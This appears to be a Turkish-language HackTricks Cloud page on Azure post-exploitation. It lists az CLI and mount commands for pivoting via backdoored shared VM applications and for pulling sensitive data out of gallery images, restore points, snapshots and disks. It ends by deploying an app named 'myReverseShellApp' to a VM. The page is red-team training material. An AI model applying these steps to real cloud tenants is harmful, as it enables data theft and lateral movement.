Az - VMs & Network Post Exploitation
Tip
AWS Hacking’i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın:HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
- PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.
VMs & Network
Azure VMs ve ağlar hakkında daha fazla bilgi için aşağıdaki sayfayı kontrol edin:
Az - Virtual Machines & Network
VM Uygulama Pivotlama
VM uygulamaları diğer abonelikler ve kiracılarla paylaşılabilir. Bir uygulama paylaşılıyorsa, muhtemelen kullanıldığı içindir. Bu nedenle, saldırgan uygulamayı ele geçirip arka kapılı bir versiyon yüklemeyi başarırsa, bu versiyonun başka bir kiracı veya abonelikte çalıştırılması mümkün olabilir.
Görsellerdeki hassas bilgiler
Geçmişteki VMs’den alınan görsellerin içinde hassas bilgiler bulmak mümkün olabilir.
- Galeri’den görselleri listele
# Get galleries
az sig list -o table
# List images inside gallery
az sig image-definition list \
--resource-group <RESOURCE_GROUP> \
--gallery-name <GALLERY_NAME> \
-o table
# Get images versions
az sig image-version list \
--resource-group <RESOURCE_GROUP> \
--gallery-name <GALLERY_NAME> \
--gallery-image-definition <IMAGE_DEFINITION> \
-o table
- Özel görüntüleri listele
az image list -o table
- Görüntü ID’sinden VM oluşturun ve içinde hassas bilgileri arayın
# Create VM from image
az vm create \
--resource-group <RESOURCE_GROUP> \
--name <VM_NAME> \
--image /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/galleries/<GALLERY_NAME>/images/<IMAGE_DEFINITION>/versions/<IMAGE_VERSION> \
--admin-username <ADMIN_USERNAME> \
--generate-ssh-keys
Restore noktalarında hassas bilgiler
Restore noktalarında hassas bilgilerin bulunması mümkün olabilir.
- Restore noktalarını listele
az restore-point list \
--resource-group <RESOURCE_GROUP> \
--restore-point-collection-name <COLLECTION_NAME> \
-o table
- Bir disk oluşturun bir geri yükleme noktasından
az disk create \
--resource-group <RESOURCE_GROUP> \
--name <NEW_DISK_NAME> \
--source /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/restorePointCollections/<COLLECTION_NAME>/restorePoints/<RESTORE_POINT_NAME>
- Bir diski bir VM’ye ekle (saldırganın zaten hesap içindeki bir VM’yi ele geçirmiş olması gerekir)
az vm disk attach \
--resource-group <RESOURCE_GROUP> \
--vm-name <VM_NAME> \
--name <DISK_NAME>
- Disk’i bağlayın ve hassas bilgileri arayın
# List all available disks
sudo fdisk -l
# Check disk format
sudo file -s /dev/sdX
# Mount it
sudo mkdir /mnt/mydisk
sudo mount /dev/sdX1 /mnt/mydisk
Disklerde ve anlık görüntülerde hassas bilgiler
Disklerde veya hatta eski disk anlık görüntülerinde hassas bilgilerin bulunması mümkün olabilir.
- Anlık görüntüleri listeleyin
az snapshot list \
--resource-group <RESOURCE_GROUP> \
-o table
- Anlık görüntüden disk oluştur (gerekirse)
az disk create \
--resource-group <RESOURCE_GROUP> \
--name <DISK_NAME> \
--source <SNAPSHOT_ID> \
--size-gb <DISK_SIZE>
- Disk’i bir VM’ye ekleyin ve bağlayın ve hassas bilgileri arayın (bunu nasıl yapacağınızı görmek için önceki bölüme bakın)
VM Uzantıları ve VM Uygulamalarında Hassas Bilgiler
VM uzantıları ve VM uygulamaları içinde hassas bilgilerin bulunması mümkün olabilir.
- Tüm VM uygulamalarını listeleyin
## List all VM applications inside a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table
- Bir VM’de uzantıyı yükleyin ve hassas bilgileri arayın
az vm application set \
--resource-group <rsc-group> \
--name <vm-name> \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
--treat-deployment-as-failure true
Tip
AWS Hacking’i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın:HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
- PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.
HackTricks Cloud

